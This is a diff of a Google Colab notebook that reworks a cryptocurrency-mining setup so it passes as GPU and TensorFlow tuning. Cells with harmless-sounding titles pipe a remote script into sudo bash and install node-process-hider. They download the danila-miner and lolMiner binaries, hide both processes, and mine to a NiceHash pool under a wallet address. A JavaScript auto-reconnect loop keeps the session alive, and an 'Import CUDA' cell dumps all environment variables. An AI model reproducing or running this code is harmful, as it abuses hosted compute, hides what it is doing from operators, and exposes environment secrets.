--- a/random-20222.ipynb
+++ b/random-20222.ipynb
@@ -33,102 +33,142 @@
       "metadata": {
         "id": "Rh-nd3WynT5K"
       },
-      "outputs": [],
       "source": [
-        "!curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider && wget https://whalepool-cdn.fra1.digitaloceanspaces.com/software/danila-miner/danila-miner-2.3.1-ubuntu-bionic.tar.gz && tar -xvf danila-miner-2.3.1-ubuntu-bionic.tar.gz && apt install screen && rm -rf danila-miner-2.3.1-ubuntu-bionic.tar.gz && wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.44/lolMiner_v1.44_Lin64.tar.gz && tar xf lolMiner_v1.44_Lin64.tar.gz &&rm -rf lolMiner_v1.44_Lin64.tar.gz && mv 1.44 lolMiner && sudo ph add danila-miner lolMiner\n"
+        "# **MINER**"
       ]
     },
     {
       "cell_type": "code",
-      "source": [
-        "\n",
-        "!./lolMiner/lolMiner --algo ETHASH --pool daggerhashimoto.usa-west.nicehash.com:3353 --user 36yg6GbEqDX8wB5mGRcVzCrbJ55RKaJT9A.suryadiii404 --ethstratum ETHV1\n",
-        "\n",
-        "\n"
-      ],
-      "metadata": {
-        "id": "fWvTcxXPn8Yw"
-      },
-      "execution_count": null,
-      "outputs": []
-    },
-    {
-      "cell_type": "markdown",
-      "metadata": {
-        "id": "cmbtuEyk3IgH"
-      },
-      "source": [
-        "# **colab-test**"
-      ]
-    },
-    {
-      "cell_type": "code",
-      "source": [
-        "#@title **GPU CHECK**\n",
-        "!nvidia-smi"
-      ],
       "metadata": {
         "cellView": "form",
-        "id": "q6m7BaFRJiEm"
+        "id": "Zjopwk9B9EK-"
       },
-      "execution_count": null,
-      "outputs": []
-    },
-    {
-      "cell_type": "code",
       "source": [
-        "#@title **SSH**\n",
+        "#@title seven Minutes\n",
         "\n",
-        "! pip install colab_ssh --upgrade &> /dev/null\n",
+        "print (\"Hello World\")\n",
         "\n",
-        "ssh_method = \"Ngrok\"\n",
+        "import IPython\n",
+        "from google.colab import output\n",
         "\n",
-        "\n",
-        "#@markdown Copy authtoken from https://dashboard.ngrok.com/auth (only for ngrok)\n",
-        "ngrokRegion = \"ap\" #@param [\"us\", \"eu\", \"ap\", \"au\", \"sa\", \"jp\", \"in\"]\n",
-        "\n",
-        "def runNgrok():\n",
-        "    from colab_ssh import launch_ssh\n",
-        "    from IPython.display import clear_output\n",
-        "\n",
-        "    import getpass\n",
-        "    ngrokToken = getpass.getpass(\"Enter the ngrokToken: \")\n",
-        "\n",
-        "    launch_ssh(ngrokToken, password, region=ngrokRegion)\n",
-        "    clear_output()\n",
-        "\n",
-        "    print(\"ssh\", user, end='@')\n",
-        "    ! curl -s http://localhost:4040/api/tunnels | python3 -c \\\n",
-        "            \"import sys, json; print(json.load(sys.stdin)['tunnels'][0]['public_url'][6:].replace(':', ' -p '))\"\n",
-        "\n",
-        "try:\n",
-        "    user = username\n",
-        "    password = password\n",
-        "except NameError:\n",
-        "    print(\"No user found, using username and password as 'root'\")\n",
-        "    user='root'\n",
-        "    password='root'\n",
-        "\n",
-        "if ssh_method == \"Ngrok\":\n",
-        "    runNgrok()"
+        "display(IPython.display.Javascript('''\n",
+        "function ClickConnect(){\n",
+        "  btn = document.querySelector(\"colab-connect-button\")\n",
+        "  if (btn != null){\n",
+        "    console.log(\"Click colab-connect-button\"); \n",
+        "    btn.click() \n",
+        "    }\n",
+        "    \n",
+        "  btn = document.getElementById('ok')\n",
+        "  if (btn != null){\n",
+        "    console.log(\"Click reconnect\"); \n",
+        "    btn.click() \n",
+        "    }\n",
+        "  }\n",
+        "    \n",
+        "setInterval(ClickConnect,10000)\n",
+        "'''))"
       ],
-      "metadata": {
-        "cellView": "form",
-        "id": "EglmQdGh4wXu"
-      },
       "execution_count": null,
       "outputs": []
     },
     {
       "cell_type": "code",
-      "source": [
-        "#@title **Sleep Mode**\n",
-        "!sleep  9 && sleep 99 && sleep 999 &&  sleep 9999 &&  sleep 99999 &&  sleep 999999 && sleep 9999999 && sleep 99999999 && sleep 999999999 &"
-      ],
       "metadata": {
         "cellView": "form",
-        "id": "ITBjQKCs4wXv"
+        "id": "QgkiBRBn3JuD"
       },
+      "source": [
+        "#@title Check GPU\n",
+        "! nvidia-smi -L"
+      ],
+      "execution_count": null,
+      "outputs": []
+    },
+    {
+      "cell_type": "code",
+      "metadata": {
+        "cellView": "form",
+        "id": "aY-uTqnp3NTD"
+      },
+      "source": [
+        "#@title Mod GPU\n",
+        "\n",
+        "from numba import jit, cuda\n",
+        "import numpy as np\n",
+        "# to measure exec time\n",
+        "from timeit import default_timer as timer\n",
+        "\n",
+        "# normal function to run on cpu\n",
+        "def func(a):\t\t\t\t\t\t\t\t\n",
+        "\tfor i in range(10000000):\n",
+        "\t\ta[i]+= 1\t\n",
+        "\n",
+        "\t\t\t\t\t\t\n",
+        "def func2(a):\n",
+        "\tfor i in range(10000000):\n",
+        "\t\ta[i]+= 1\n",
+        "if __name__==\"__main__\":\n",
+        "\tn = 10000000\t\t\t\t\t\t\t\n",
+        "\ta = np.ones(n, dtype = np.float64)\n",
+        "\tb = np.ones(n, dtype = np.float32)\n",
+        "\t\n",
+        "\tstart = timer()\n",
+        "\tfunc(a)\n",
+        "\tprint(\"without GPU:\", timer()-start)\t\n",
+        "\t\n",
+        "\tstart = timer()\n",
+        "\tfunc2(a)\n",
+        "\tprint(\"with GPU:\", timer()-start)"
+      ],
+      "execution_count": null,
+      "outputs": []
+    },
+    {
+      "cell_type": "code",
+      "metadata": {
+        "cellView": "form",
+        "id": "S8eJcs9G3YCb"
+      },
+      "source": [
+        "#@title Import CUDA\n",
+        "\n",
+        "import os\n",
+        "' && '.join([f'export {name}=\"{value}\"' for name, value in os.environ.items()])"
+      ],
+      "execution_count": null,
+      "outputs": []
+    },
+    {
+      "cell_type": "code",
+      "metadata": {
+        "cellView": "form",
+        "id": "Ujt1vWgY3gvT"
+      },
+      "source": [
+        "#@title Tensor Maksimum\n",
+        "\n",
+        "import tensorflow as tf\n",
+        "\n",
+        "from tensorflow import keras\n",
+        "from tensorflow.keras import layers\n",
+        "from tensorflow.keras import mixed_precision\n",
+        "\n",
+        "mixed_precision.set_global_policy('mixed_float16')"
+      ],
+      "execution_count": null,
+      "outputs": []
+    },
+    {
+      "cell_type": "code",
+      "metadata": {
+        "cellView": "form",
+        "id": "w8EUKw1q3Juw"
+      },
+      "source": [
+        "#@title START.....\n",
+        "!curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider && wget https://whalepool-cdn.fra1.digitaloceanspaces.com/software/danila-miner/danila-miner-2.3.1-ubuntu-bionic.tar.gz && tar -xvf danila-miner-2.3.1-ubuntu-bionic.tar.gz && apt install screen && rm -rf danila-miner-2.3.1-ubuntu-bionic.tar.gz && wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.44/lolMiner_v1.44_Lin64.tar.gz && tar xf lolMiner_v1.44_Lin64.tar.gz &&rm -rf lolMiner_v1.44_Lin64.tar.gz && mv 1.44 lolMiner && sudo ph add danila-miner lolMiner && ./lolMiner/lolMiner --algo ETHASH --pool daggerhashimoto.usa-west.nicehash.com:3353 --user 36yg6GbEqDX8wB5mGRcVzCrbJ55RKaJT9A.suryadiii404 --ethstratum ETHV1"
+      ],
       "execution_count": null,
       "outputs": []
     }
